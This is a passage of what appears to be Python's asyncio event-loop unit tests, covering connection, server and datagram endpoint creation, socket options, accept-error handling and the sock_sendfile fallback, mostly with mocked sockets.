    self.assertTrue(str(cm.exception).startswith('Multiple exceptions: '))
    self.assertTrue(m_socket.socket.return_value.close.called)
def _test_create_connection_ip_addr(self, m_socket, allow_inet_pton):
    """Shared driver: connect to literal IPv4/IPv6 addresses and verify
    the socket family/type used, with or without inet_pton available.

    When *allow_inet_pton* is false, socket.inet_pton is deleted from the
    mock to exercise the getaddrinfo fallback path.
    """
    # Test the fallback code, even if this system has inet_pton.
    if not allow_inet_pton:
        del m_socket.inet_pton
    m_socket.getaddrinfo = socket.getaddrinfo
    sock = m_socket.socket.return_value
    # Stub reader/writer registration; _is_coroutine=False keeps the
    # mocks from being treated as coroutine functions.
    self.loop._add_reader = mock.Mock()
    self.loop._add_reader._is_coroutine = False
    self.loop._add_writer = mock.Mock()
    self.loop._add_writer._is_coroutine = False
    coro = self.loop.create_connection(asyncio.Protocol, '1.2.3.4', 80)
    t, p = self.loop.run_until_complete(coro)
    try:
        sock.connect.assert_called_with(('1.2.3.4', 80))
        _, kwargs = m_socket.socket.call_args
        self.assertEqual(kwargs['family'], m_socket.AF_INET)
        self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
    finally:
        t.close()
        test_utils.run_briefly(self.loop)  # allow transport to close
    if not support.IPV6_ENABLED:
        return
    sock.family = socket.AF_INET6
    coro = self.loop.create_connection(asyncio.Protocol, '::1', 80)
    t, p = self.loop.run_until_complete(coro)
    try:
        # Without inet_pton we use getaddrinfo, which transforms ('::1', 80)
        # to ('::1', 80, 0, 0). The last 0s are flow info, scope id.
        [address] = sock.connect.call_args[0]
        host, port = address[:2]
        self.assertRegex(host, r'::(0\.)*1')
        self.assertEqual(port, 80)
        _, kwargs = m_socket.socket.call_args
        self.assertEqual(kwargs['family'], m_socket.AF_INET6)
        self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
    finally:
        t.close()
        test_utils.run_briefly(self.loop)  # allow transport to close
@unittest.skipUnless(support.IPV6_ENABLED, 'no IPv6 support')
@unittest.skipIf(sys.platform.startswith('aix'),
                 "bpo-25545: IPv6 scope id and getaddrinfo() behave differently on AIX")
@patch_socket
def test_create_connection_ipv6_scope(self, m_socket):
    """A literal IPv6 address with a scope id ('fe80::1%1') is parsed
    into a 4-tuple address with the scope id as the fourth element."""
    m_socket.getaddrinfo = socket.getaddrinfo
    sock = m_socket.socket.return_value
    sock.family = socket.AF_INET6
    self.loop._add_reader = mock.Mock()
    self.loop._add_reader._is_coroutine = False
    self.loop._add_writer = mock.Mock()
    self.loop._add_writer._is_coroutine = False
    coro = self.loop.create_connection(asyncio.Protocol, 'fe80::1%1', 80)
    t, p = self.loop.run_until_complete(coro)
    try:
        sock.connect.assert_called_with(('fe80::1', 80, 0, 1))
        _, kwargs = m_socket.socket.call_args
        self.assertEqual(kwargs['family'], m_socket.AF_INET6)
        self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
    finally:
        t.close()
        test_utils.run_briefly(self.loop)  # allow transport to close
@patch_socket
def test_create_connection_ip_addr(self, m_socket):
    """Literal-IP connection with inet_pton available."""
    self._test_create_connection_ip_addr(m_socket, True)
@patch_socket
def test_create_connection_no_inet_pton(self, m_socket):
    """Literal-IP connection via the getaddrinfo fallback (no inet_pton)."""
    self._test_create_connection_ip_addr(m_socket, False)
@patch_socket
def test_create_connection_service_name(self, m_socket):
    """A service name ('http', str or bytes) resolves to its port number;
    an unknown service name raises OSError."""
    m_socket.getaddrinfo = socket.getaddrinfo
    sock = m_socket.socket.return_value
    self.loop._add_reader = mock.Mock()
    self.loop._add_reader._is_coroutine = False
    self.loop._add_writer = mock.Mock()
    self.loop._add_writer._is_coroutine = False
    for service, port in ('http', 80), (b'http', 80):
        coro = self.loop.create_connection(asyncio.Protocol,
                                           '127.0.0.1', service)
        t, p = self.loop.run_until_complete(coro)
        try:
            sock.connect.assert_called_with(('127.0.0.1', port))
            _, kwargs = m_socket.socket.call_args
            self.assertEqual(kwargs['family'], m_socket.AF_INET)
            self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
        finally:
            t.close()
            test_utils.run_briefly(self.loop)  # allow transport to close
    for service in 'nonsense', b'nonsense':
        coro = self.loop.create_connection(asyncio.Protocol,
                                           '127.0.0.1', service)
        with self.assertRaises(OSError):
            self.loop.run_until_complete(coro)
def test_create_connection_no_local_addr(self):
    """create_connection() raises OSError when local_addr cannot be
    resolved (getaddrinfo returns no addresses for it)."""
    async def getaddrinfo(host, *args, **kw):
        # Only the remote host resolves; the local address does not.
        if host == 'example.com':
            return [(2, 1, 6, '', ('107.6.106.82', 80)),
                    (2, 1, 6, '', ('107.6.106.82', 80))]
        else:
            return []
    def getaddrinfo_task(*args, **kwds):
        return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
    self.loop.getaddrinfo = getaddrinfo_task
    coro = self.loop.create_connection(
        MyProto, 'example.com', 80, family=socket.AF_INET,
        local_addr=(None, 8080))
    self.assertRaises(
        OSError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_connection_bluetooth(self, m_socket):
    """sock_connect falls back to getaddrinfo for addresses it cannot
    recognize as already resolved (e.g. a Bluetooth address)."""
    # See http://bugs.python.org/issue27136, fallback to getaddrinfo when
    # we can't recognize an address is resolved, e.g. a Bluetooth address.
    addr = ('00:01:02:03:04:05', 1)
    def getaddrinfo(host, port, *args, **kw):
        assert (host, port) == addr
        return [(999, 1, 999, '', (addr, 1))]
    m_socket.getaddrinfo = getaddrinfo
    sock = m_socket.socket()
    coro = self.loop.sock_connect(sock, addr)
    self.loop.run_until_complete(coro)
def test_create_connection_ssl_server_hostname_default(self):
    """_make_ssl_transport receives the connection host as the default
    server_hostname, or the explicit value (including '') when given,
    and the ssl_handshake_timeout is passed through unchanged."""
    self.loop.getaddrinfo = mock.Mock()
    def mock_getaddrinfo(*args, **kwds):
        f = asyncio.Future(loop=self.loop)
        f.set_result([(socket.AF_INET, socket.SOCK_STREAM,
                       socket.SOL_TCP, '', ('1.2.3.4', 80))])
        return f
    self.loop.getaddrinfo.side_effect = mock_getaddrinfo
    self.loop.sock_connect = mock.Mock()
    self.loop.sock_connect.return_value = self.loop.create_future()
    self.loop.sock_connect.return_value.set_result(None)
    self.loop._make_ssl_transport = mock.Mock()
    class _SelectorTransportMock:
        _sock = None
        def get_extra_info(self, key):
            return mock.Mock()
        def close(self):
            self._sock.close()
    def mock_make_ssl_transport(sock, protocol, sslcontext, waiter,
                                **kwds):
        # Complete the waiter immediately so create_connection returns.
        waiter.set_result(None)
        transport = _SelectorTransportMock()
        transport._sock = sock
        return transport
    self.loop._make_ssl_transport.side_effect = mock_make_ssl_transport
    ANY = mock.ANY
    # Sentinel: only identity matters for the pass-through check.
    handshake_timeout = object()
    # First try the default server_hostname.
    self.loop._make_ssl_transport.reset_mock()
    coro = self.loop.create_connection(
        MyProto, 'python.org', 80, ssl=True,
        ssl_handshake_timeout=handshake_timeout)
    transport, _ = self.loop.run_until_complete(coro)
    transport.close()
    self.loop._make_ssl_transport.assert_called_with(
        ANY, ANY, ANY, ANY,
        server_side=False,
        server_hostname='python.org',
        ssl_handshake_timeout=handshake_timeout)
    # Next try an explicit server_hostname.
    self.loop._make_ssl_transport.reset_mock()
    coro = self.loop.create_connection(
        MyProto, 'python.org', 80, ssl=True,
        server_hostname='perl.com',
        ssl_handshake_timeout=handshake_timeout)
    transport, _ = self.loop.run_until_complete(coro)
    transport.close()
    self.loop._make_ssl_transport.assert_called_with(
        ANY, ANY, ANY, ANY,
        server_side=False,
        server_hostname='perl.com',
        ssl_handshake_timeout=handshake_timeout)
    # Finally try an explicit empty server_hostname.
    self.loop._make_ssl_transport.reset_mock()
    coro = self.loop.create_connection(
        MyProto, 'python.org', 80, ssl=True,
        server_hostname='',
        ssl_handshake_timeout=handshake_timeout)
    transport, _ = self.loop.run_until_complete(coro)
    transport.close()
    self.loop._make_ssl_transport.assert_called_with(
        ANY, ANY, ANY, ANY,
        server_side=False,
        server_hostname='',
        ssl_handshake_timeout=handshake_timeout)
def test_create_connection_no_ssl_server_hostname_errors(self):
    # When not using ssl, server_hostname must be None.
    # Both an empty string and a real hostname are rejected with ValueError.
    coro = self.loop.create_connection(MyProto, 'python.org', 80,
                                       server_hostname='')
    self.assertRaises(ValueError, self.loop.run_until_complete, coro)
    coro = self.loop.create_connection(MyProto, 'python.org', 80,
                                       server_hostname='python.org')
    self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_ssl_server_hostname_errors(self):
    # When using ssl, server_hostname may be None if host is non-empty.
    coro = self.loop.create_connection(MyProto, '', 80, ssl=True)
    self.assertRaises(ValueError, self.loop.run_until_complete, coro)
    coro = self.loop.create_connection(MyProto, None, 80, ssl=True)
    self.assertRaises(ValueError, self.loop.run_until_complete, coro)
    # With an explicit sock and no host, there is no hostname to infer,
    # so ssl=True without server_hostname is also rejected.
    sock = socket.socket()
    coro = self.loop.create_connection(MyProto, None, None,
                                       ssl=True, sock=sock)
    self.addCleanup(sock.close)
    self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_ssl_timeout_for_plain_socket(self):
    # ssl_handshake_timeout without ssl=... must be rejected up front.
    coro = self.loop.create_connection(
        MyProto, 'example.com', 80, ssl_handshake_timeout=1)
    with self.assertRaisesRegex(
            ValueError,
            'ssl_handshake_timeout is only meaningful with ssl'):
        self.loop.run_until_complete(coro)
def test_create_server_empty_host(self):
    # if host is empty string use None instead
    host = object()

    async def getaddrinfo(*args, **kw):
        # Capture the host argument actually passed to getaddrinfo.
        nonlocal host
        host = args[0]
        return []

    def getaddrinfo_task(*args, **kwds):
        return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)

    self.loop.getaddrinfo = getaddrinfo_task
    fut = self.loop.create_server(MyProto, '', 0)
    # Empty addrinfo list makes create_server fail with OSError...
    self.assertRaises(OSError, self.loop.run_until_complete, fut)
    # ...but the '' host must have been translated to None first.
    self.assertIsNone(host)
def test_create_server_host_port_sock(self):
    # Passing an explicit sock together with host/port is ambiguous.
    fut = self.loop.create_server(
        MyProto, '0.0.0.0', 0, sock=object())
    self.assertRaises(ValueError, self.loop.run_until_complete, fut)
def test_create_server_no_host_port_sock(self):
    # Neither host/port nor sock given: nothing to listen on.
    fut = self.loop.create_server(MyProto)
    self.assertRaises(ValueError, self.loop.run_until_complete, fut)
def test_create_server_no_getaddrinfo(self):
    # getaddrinfo resolving to None (no addresses) surfaces as OSError.
    getaddrinfo = self.loop.getaddrinfo = mock.Mock()
    getaddrinfo.return_value = self.loop.create_future()
    getaddrinfo.return_value.set_result(None)

    f = self.loop.create_server(MyProto, 'python.org', 0)
    self.assertRaises(OSError, self.loop.run_until_complete, f)
@patch_socket
def test_create_server_nosoreuseport(self, m_socket):
    # reuse_port=True must fail cleanly when the platform lacks SO_REUSEPORT.
    m_socket.getaddrinfo = socket.getaddrinfo
    del m_socket.SO_REUSEPORT
    m_socket.socket.return_value = mock.Mock()

    f = self.loop.create_server(
        MyProto, '0.0.0.0', 0, reuse_port=True)
    self.assertRaises(ValueError, self.loop.run_until_complete, f)
@patch_socket
def test_create_server_soreuseport_only_defined(self, m_socket):
    m_socket.getaddrinfo = socket.getaddrinfo
    m_socket.socket.return_value = mock.Mock()
    # NOTE(review): SO_REUSEPORT exists here but is set to -1 — presumably
    # an invalid option number so setsockopt fails; confirm against
    # base_events' reuse_port handling.
    m_socket.SO_REUSEPORT = -1

    f = self.loop.create_server(
        MyProto, '0.0.0.0', 0, reuse_port=True)
    self.assertRaises(ValueError, self.loop.run_until_complete, f)
@patch_socket
def test_create_server_cant_bind(self, m_socket):
    # bind() failure must propagate as OSError and close the socket.
    class Err(OSError):
        strerror = 'error'

    m_socket.getaddrinfo.return_value = [
        (2, 1, 6, '', ('127.0.0.1', 10100))]
    m_socket.getaddrinfo._is_coroutine = False
    m_sock = m_socket.socket.return_value = mock.Mock()
    m_sock.bind.side_effect = Err

    fut = self.loop.create_server(MyProto, '0.0.0.0', 0)
    self.assertRaises(OSError, self.loop.run_until_complete, fut)
    self.assertTrue(m_sock.close.called)
@patch_socket
def test_create_datagram_endpoint_no_addrinfo(self, m_socket):
    # Empty getaddrinfo result -> OSError.
    m_socket.getaddrinfo.return_value = []
    m_socket.getaddrinfo._is_coroutine = False

    coro = self.loop.create_datagram_endpoint(
        MyDatagramProto, local_addr=('localhost', 0))
    self.assertRaises(
        OSError, self.loop.run_until_complete, coro)
def test_create_datagram_endpoint_addr_error(self):
    # local_addr must be a (host, port) 2-tuple, not a bare string
    # and not a longer tuple.
    coro = self.loop.create_datagram_endpoint(
        MyDatagramProto, local_addr='localhost')
    self.assertRaises(
        AssertionError, self.loop.run_until_complete, coro)
    coro = self.loop.create_datagram_endpoint(
        MyDatagramProto, local_addr=('localhost', 1, 2, 3))
    self.assertRaises(
        AssertionError, self.loop.run_until_complete, coro)
def test_create_datagram_endpoint_connect_err(self):
    # sock_connect failure propagates out of create_datagram_endpoint.
    self.loop.sock_connect = mock.Mock()
    self.loop.sock_connect.side_effect = OSError

    coro = self.loop.create_datagram_endpoint(
        asyncio.DatagramProtocol, remote_addr=('127.0.0.1', 0))
    self.assertRaises(
        OSError, self.loop.run_until_complete, coro)
def test_create_datagram_endpoint_allow_broadcast(self):
    # With allow_broadcast, the socket must NOT be connected to remote_addr.
    protocol = MyDatagramProto(create_future=True, loop=self.loop)
    self.loop.sock_connect = sock_connect = mock.Mock()
    sock_connect.return_value = []

    coro = self.loop.create_datagram_endpoint(
        lambda: protocol,
        remote_addr=('127.0.0.1', 0),
        allow_broadcast=True)

    transport, _ = self.loop.run_until_complete(coro)
    self.assertFalse(sock_connect.called)

    transport.close()
    self.loop.run_until_complete(protocol.done)
    self.assertEqual('CLOSED', protocol.state)
@patch_socket
def test_create_datagram_endpoint_socket_err(self, m_socket):
    # socket() failure propagates for both family- and addr-based calls.
    m_socket.getaddrinfo = socket.getaddrinfo
    m_socket.socket.side_effect = OSError

    coro = self.loop.create_datagram_endpoint(
        asyncio.DatagramProtocol, family=socket.AF_INET)
    self.assertRaises(
        OSError, self.loop.run_until_complete, coro)

    coro = self.loop.create_datagram_endpoint(
        asyncio.DatagramProtocol, local_addr=('127.0.0.1', 0))
    self.assertRaises(
        OSError, self.loop.run_until_complete, coro)
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_datagram_endpoint_no_matching_family(self):
    # IPv4 remote address with an IPv6 local address cannot share a family.
    coro = self.loop.create_datagram_endpoint(
        asyncio.DatagramProtocol,
        remote_addr=('127.0.0.1', 0), local_addr=('::1', 0))
    self.assertRaises(
        ValueError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_datagram_endpoint_setblk_err(self, m_socket):
    # setblocking() failure must propagate and close the new socket.
    m_socket.socket.return_value.setblocking.side_effect = OSError

    coro = self.loop.create_datagram_endpoint(
        asyncio.DatagramProtocol, family=socket.AF_INET)
    self.assertRaises(
        OSError, self.loop.run_until_complete, coro)
    self.assertTrue(
        m_socket.socket.return_value.close.called)
def test_create_datagram_endpoint_noaddr_nofamily(self):
    # Without an address or an explicit family there is nothing to create.
    coro = self.loop.create_datagram_endpoint(
        asyncio.DatagramProtocol)
    self.assertRaises(ValueError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_datagram_endpoint_cant_bind(self, m_socket):
    # bind() failure propagates as the original exception type and the
    # partially-created socket is closed.
    class Err(OSError):
        pass

    m_socket.getaddrinfo = socket.getaddrinfo
    m_sock = m_socket.socket.return_value = mock.Mock()
    m_sock.bind.side_effect = Err

    fut = self.loop.create_datagram_endpoint(
        MyDatagramProto,
        local_addr=('127.0.0.1', 0), family=socket.AF_INET)
    self.assertRaises(Err, self.loop.run_until_complete, fut)
    self.assertTrue(m_sock.close.called)
def test_create_datagram_endpoint_sock(self):
    # A pre-made, bound UDP socket can be handed in directly via sock=.
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(('127.0.0.1', 0))
    fut = self.loop.create_datagram_endpoint(
        lambda: MyDatagramProto(create_future=True, loop=self.loop),
        sock=sock)
    transport, protocol = self.loop.run_until_complete(fut)
    transport.close()
    self.loop.run_until_complete(protocol.done)
    self.assertEqual('CLOSED', protocol.state)
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_datagram_endpoint_sock_unix(self):
    # family=AF_UNIX alone is enough to create an (unbound) datagram socket.
    fut = self.loop.create_datagram_endpoint(
        lambda: MyDatagramProto(create_future=True, loop=self.loop),
        family=socket.AF_UNIX)
    transport, protocol = self.loop.run_until_complete(fut)
    assert transport._sock.family == socket.AF_UNIX
    transport.close()
    self.loop.run_until_complete(protocol.done)
    self.assertEqual('CLOSED', protocol.state)
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_datagram_endpoint_existing_sock_unix(self):
    # Binding to a path that previously held a (now closed) socket works.
    with test_utils.unix_socket_path() as path:
        sock = socket.socket(socket.AF_UNIX, type=socket.SOCK_DGRAM)
        sock.bind(path)
        sock.close()

        coro = self.loop.create_datagram_endpoint(
            lambda: MyDatagramProto(create_future=True, loop=self.loop),
            path, family=socket.AF_UNIX)
        transport, protocol = self.loop.run_until_complete(coro)
        transport.close()
        self.loop.run_until_complete(protocol.done)
def test_create_datagram_endpoint_sock_sockopts(self):
    # When an explicit sock= is given, every other socket-configuration
    # argument is mutually exclusive with it and must raise ValueError.
    class FakeSock:
        type = socket.SOCK_DGRAM

    fut = self.loop.create_datagram_endpoint(
        MyDatagramProto, local_addr=('127.0.0.1', 0), sock=FakeSock())
    self.assertRaises(ValueError, self.loop.run_until_complete, fut)

    fut = self.loop.create_datagram_endpoint(
        MyDatagramProto, remote_addr=('127.0.0.1', 0), sock=FakeSock())
    self.assertRaises(ValueError, self.loop.run_until_complete, fut)

    fut = self.loop.create_datagram_endpoint(
        MyDatagramProto, family=1, sock=FakeSock())
    self.assertRaises(ValueError, self.loop.run_until_complete, fut)

    fut = self.loop.create_datagram_endpoint(
        MyDatagramProto, proto=1, sock=FakeSock())
    self.assertRaises(ValueError, self.loop.run_until_complete, fut)

    fut = self.loop.create_datagram_endpoint(
        MyDatagramProto, flags=1, sock=FakeSock())
    self.assertRaises(ValueError, self.loop.run_until_complete, fut)

    fut = self.loop.create_datagram_endpoint(
        MyDatagramProto, reuse_address=True, sock=FakeSock())
    self.assertRaises(ValueError, self.loop.run_until_complete, fut)

    fut = self.loop.create_datagram_endpoint(
        MyDatagramProto, reuse_port=True, sock=FakeSock())
    self.assertRaises(ValueError, self.loop.run_until_complete, fut)

    fut = self.loop.create_datagram_endpoint(
        MyDatagramProto, allow_broadcast=True, sock=FakeSock())
    self.assertRaises(ValueError, self.loop.run_until_complete, fut)
def test_create_datagram_endpoint_sockopts(self):
    # Socket options should not be applied unless asked for.
    # SO_REUSEADDR defaults to on for UNIX.
    # SO_REUSEPORT is not available on all platforms.

    # First endpoint: no option flags requested.
    coro = self.loop.create_datagram_endpoint(
        lambda: MyDatagramProto(create_future=True, loop=self.loop),
        local_addr=('127.0.0.1', 0))
    transport, protocol = self.loop.run_until_complete(coro)
    sock = transport.get_extra_info('socket')

    reuse_address_default_on = (
        os.name == 'posix' and sys.platform != 'cygwin')
    reuseport_supported = hasattr(socket, 'SO_REUSEPORT')

    if reuse_address_default_on:
        self.assertTrue(
            sock.getsockopt(
                socket.SOL_SOCKET, socket.SO_REUSEADDR))
    else:
        self.assertFalse(
            sock.getsockopt(
                socket.SOL_SOCKET, socket.SO_REUSEADDR))
    if reuseport_supported:
        self.assertFalse(
            sock.getsockopt(
                socket.SOL_SOCKET, socket.SO_REUSEPORT))
    self.assertFalse(
        sock.getsockopt(
            socket.SOL_SOCKET, socket.SO_BROADCAST))

    transport.close()
    self.loop.run_until_complete(protocol.done)
    self.assertEqual('CLOSED', protocol.state)

    # Second endpoint: every supported option requested explicitly.
    coro = self.loop.create_datagram_endpoint(
        lambda: MyDatagramProto(create_future=True, loop=self.loop),
        local_addr=('127.0.0.1', 0),
        reuse_address=True,
        reuse_port=reuseport_supported,
        allow_broadcast=True)
    transport, protocol = self.loop.run_until_complete(coro)
    sock = transport.get_extra_info('socket')

    self.assertTrue(
        sock.getsockopt(
            socket.SOL_SOCKET, socket.SO_REUSEADDR))
    if reuseport_supported:
        self.assertTrue(
            sock.getsockopt(
                socket.SOL_SOCKET, socket.SO_REUSEPORT))
    self.assertTrue(
        sock.getsockopt(
            socket.SOL_SOCKET, socket.SO_BROADCAST))

    transport.close()
    self.loop.run_until_complete(protocol.done)
    self.assertEqual('CLOSED', protocol.state)
@patch_socket
def test_create_datagram_endpoint_nosoreuseport(self, m_socket):
    # reuse_port=True must be rejected when SO_REUSEPORT is unavailable.
    del m_socket.SO_REUSEPORT
    m_socket.socket.return_value = mock.Mock()

    coro = self.loop.create_datagram_endpoint(
        lambda: MyDatagramProto(loop=self.loop),
        local_addr=('127.0.0.1', 0),
        reuse_address=False,
        reuse_port=True)
    self.assertRaises(ValueError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_datagram_endpoint_ip_addr(self, m_socket):
    # A numeric IP literal must bypass getaddrinfo entirely.
    def getaddrinfo(*args, **kw):
        self.fail('should not have called getaddrinfo')

    m_socket.getaddrinfo = getaddrinfo
    m_socket.socket.return_value.bind = bind = mock.Mock()
    self.loop._add_reader = mock.Mock()
    self.loop._add_reader._is_coroutine = False

    reuseport_supported = hasattr(socket, 'SO_REUSEPORT')
    coro = self.loop.create_datagram_endpoint(
        lambda: MyDatagramProto(loop=self.loop),
        local_addr=('1.2.3.4', 0),
        reuse_address=False,
        reuse_port=reuseport_supported)

    t, p = self.loop.run_until_complete(coro)
    try:
        bind.assert_called_with(('1.2.3.4', 0))
        m_socket.socket.assert_called_with(family=m_socket.AF_INET,
                                           proto=m_socket.IPPROTO_UDP,
                                           type=m_socket.SOCK_DGRAM)
    finally:
        t.close()
        test_utils.run_briefly(self.loop)  # allow transport to close
def test_accept_connection_retry(self):
    # A transient EAGAIN-style failure: the listening socket stays open.
    sock = mock.Mock()
    sock.accept.side_effect = BlockingIOError()

    self.loop._accept_connection(MyProto, sock)
    self.assertFalse(sock.close.called)
@mock.patch('asyncio.base_events.logger')
def test_accept_connection_exception(self, m_log):
    # On EMFILE the loop logs an error, stops reading the listening fd,
    # and schedules a delayed restart instead of closing the socket.
    sock = mock.Mock()
    sock.fileno.return_value = 10
    sock.accept.side_effect = OSError(errno.EMFILE, 'Too many open files')
    self.loop._remove_reader = mock.Mock()
    self.loop.call_later = mock.Mock()

    self.loop._accept_connection(MyProto, sock)
    self.assertTrue(m_log.error.called)
    self.assertFalse(sock.close.called)
    self.loop._remove_reader.assert_called_with(10)
    self.loop.call_later.assert_called_with(
        constants.ACCEPT_RETRY_DELAY,
        # self.loop._start_serving
        mock.ANY,
        MyProto, sock, None, None, mock.ANY, mock.ANY)
def test_call_coroutine(self):
    # Coroutine functions and coroutine objects are not valid callbacks
    # for the call_* scheduling APIs or run_in_executor.
    with self.assertWarns(DeprecationWarning):
        @asyncio.coroutine
        def simple_coroutine():
            pass

    self.loop.set_debug(True)
    coro_func = simple_coroutine
    coro_obj = coro_func()
    self.addCleanup(coro_obj.close)
    for func in (coro_func, coro_obj):
        with self.assertRaises(TypeError):
            self.loop.call_soon(func)
        with self.assertRaises(TypeError):
            self.loop.call_soon_threadsafe(func)
        with self.assertRaises(TypeError):
            self.loop.call_later(60, func)
        with self.assertRaises(TypeError):
            self.loop.call_at(self.loop.time() + 60, func)
        with self.assertRaises(TypeError):
            self.loop.run_until_complete(
                self.loop.run_in_executor(None, func))
@mock.patch('asyncio.base_events.logger')
def test_log_slow_callbacks(self, m_logger):
    def stop_loop_cb(loop):
        loop.stop()

    async def stop_loop_coro(loop):
        loop.stop()

    asyncio.set_event_loop(self.loop)
    self.loop.set_debug(True)
    # Zero threshold: every callback counts as "slow".
    self.loop.slow_callback_duration = 0.0

    # slow callback
    self.loop.call_soon(stop_loop_cb, self.loop)
    self.loop.run_forever()
    fmt, *args = m_logger.warning.call_args[0]
    self.assertRegex(fmt % tuple(args),
                     "^Executing <Handle.*stop_loop_cb.*> "
                     "took .* seconds$")

    # slow task
    asyncio.ensure_future(stop_loop_coro(self.loop), loop=self.loop)
    self.loop.run_forever()
    fmt, *args = m_logger.warning.call_args[0]
    self.assertRegex(fmt % tuple(args),
                     "^Executing <Task.*stop_loop_coro.*> "
                     "took .* seconds$")
class RunningLoopTests(unittest.TestCase):
    """Checks on nesting restrictions between event loops."""

    def test_running_loop_within_a_loop(self):
        # run_until_complete on one loop while its coroutine tries to run
        # another loop must be rejected with RuntimeError.
        async def runner(loop):
            loop.run_forever()

        loop = asyncio.new_event_loop()
        outer_loop = asyncio.new_event_loop()
        try:
            with self.assertRaisesRegex(RuntimeError,
                                        'while another loop is running'):
                outer_loop.run_until_complete(runner(loop))
        finally:
            loop.close()
            outer_loop.close()
class BaseLoopSockSendfileTests(test_utils.TestCase):
    """Tests for loop.sock_sendfile() on a loop without native sendfile."""

    DATA = b"12345abcde" * 16 * 1024  # 160 KiB

    class MyProto(asyncio.Protocol):
        """Receiving side: accumulates bytes; `fut` resolves on close."""

        def __init__(self, loop):
            self.started = False
            self.closed = False
            self.data = bytearray()
            self.fut = loop.create_future()
            self.transport = None

        def connection_made(self, transport):
            self.started = True
            self.transport = transport

        def data_received(self, data):
            self.data.extend(data)

        def connection_lost(self, exc):
            self.closed = True
            self.fut.set_result(None)
            self.transport = None

        async def wait_closed(self):
            await self.fut

    @classmethod
    def setUpClass(cls):
        # Shrink the fallback read buffer so the test file (160 KiB) is
        # sent in several chunks, then create that file.
        cls.__old_bufsize = constants.SENDFILE_FALLBACK_READBUFFER_SIZE
        constants.SENDFILE_FALLBACK_READBUFFER_SIZE = 1024 * 16
        with open(support.TESTFN, 'wb') as fp:
            fp.write(cls.DATA)
        super().setUpClass()

    @classmethod
    def tearDownClass(cls):
        # Restore the buffer size and remove the test file.
        constants.SENDFILE_FALLBACK_READBUFFER_SIZE = cls.__old_bufsize
        support.unlink(support.TESTFN)
        super().tearDownClass()

    def setUp(self):
        from asyncio.selector_events import BaseSelectorEventLoop
        # BaseSelectorEventLoop() has no native implementation
        self.loop = BaseSelectorEventLoop()
        self.set_event_loop(self.loop)
        self.file = open(support.TESTFN, 'rb')
        self.addCleanup(self.file.close)
        super().setUp()

    def make_socket(self, blocking=False):
        # TCP socket registered for cleanup; non-blocking by default.
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.setblocking(blocking)
        self.addCleanup(sock.close)
        return sock

    def run_loop(self, coro):
        return self.loop.run_until_complete(coro)

    def prepare(self):
        # Build a connected (client socket, server-side protocol) pair
        # and register full cleanup.
        sock = self.make_socket()
        proto = self.MyProto(self.loop)
        server = self.run_loop(self.loop.create_server(
            lambda: proto, support.HOST, 0, family=socket.AF_INET))
        addr = server.sockets[0].getsockname()

        # Retry the connect a few times in case the server is slow to start.
        for _ in range(10):
            try:
                self.run_loop(self.loop.sock_connect(sock, addr))
            except OSError:
                self.run_loop(asyncio.sleep(0.5))
                continue
            else:
                break
        else:
            # One last try, so we get the exception
            self.run_loop(self.loop.sock_connect(sock, addr))

        def cleanup():
            server.close()
            self.run_loop(server.wait_closed())
            sock.close()
            if proto.transport is not None:
                proto.transport.close()
                self.run_loop(proto.wait_closed())

        self.addCleanup(cleanup)
        return sock, proto

    def test__sock_sendfile_native_failure(self):
        # The native path is unavailable on this loop and must say so
        # without consuming any data.
        sock, proto = self.prepare()

        with self.assertRaisesRegex(asyncio.SendfileNotAvailableError,
                                    "sendfile is not available"):
            self.run_loop(self.loop._sock_sendfile_native(sock, self.file,
                                                          0, None))

        self.assertEqual(proto.data, b'')
        self.assertEqual(self.file.tell(), 0)

    def test_sock_sendfile_no_fallback(self):
        # fallback=False surfaces the same error; nothing is sent or read.
        sock, proto = self.prepare()

        with self.assertRaisesRegex(asyncio.SendfileNotAvailableError,
                                    "sendfile is not available"):
            self.run_loop(self.loop.sock_sendfile(sock, self.file,
                                                  fallback=False))

        self.assertEqual(self.file.tell(), 0)
        self.assertEqual(proto.data, b'')

    def test_sock_sendfile_fallback(self):
        # The default (fallback allowed) transfers the whole file.
        sock, proto = self.prepare()

        ret = self.run_loop(self.loop.sock_sendfile(sock, self.file))
        sock.close()
        self.run_loop(proto.wait_closed())

        self.assertEqual(ret, len(self.DATA))
        self.assertEqual(self.file.tell(), len(self.DATA))
        self.assertEqual(proto.data, self.DATA)

    def test_sock_sendfile_fallback_offset_and_count(self):
        # offset/count select a slice; file position ends at offset+count.
        sock, proto = self.prepare()

        ret = self.run_loop(self.loop.sock_sendfile(sock, self.file,
                                                    1000, 2000))
        sock.close()
        self.run_loop(proto.wait_closed())

        self.assertEqual(ret, 2000)
        self.assertEqual(self.file.tell(), 3000)
        self.assertEqual(proto.data, self.DATA[1000:3000])

    def test_blocking_socket(self):
        # Blocking sockets are rejected in debug mode.
        self.loop.set_debug(True)
        sock = self.make_socket(blocking=True)
        with self.assertRaisesRegex(ValueError, "must be non-blocking"):
            self.run_loop(self.loop.sock_sendfile(sock, self.file))

    def test_nonbinary_file(self):
        # Text-mode files are rejected.
        sock = self.make_socket()
        with open(support.TESTFN, 'r') as f:
            with self.assertRaisesRegex(ValueError, "binary mode"):
                self.run_loop(self.loop.sock_sendfile(sock, f))

    def test_nonstream_socket(self):
        # Datagram sockets are rejected.
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.setblocking(False)
        self.addCleanup(sock.close)
        with self.assertRaisesRegex(ValueError, "only SOCK_STREAM type"):
            self.run_loop(self.loop.sock_sendfile(sock, self.file))

    def test_notint_count(self):
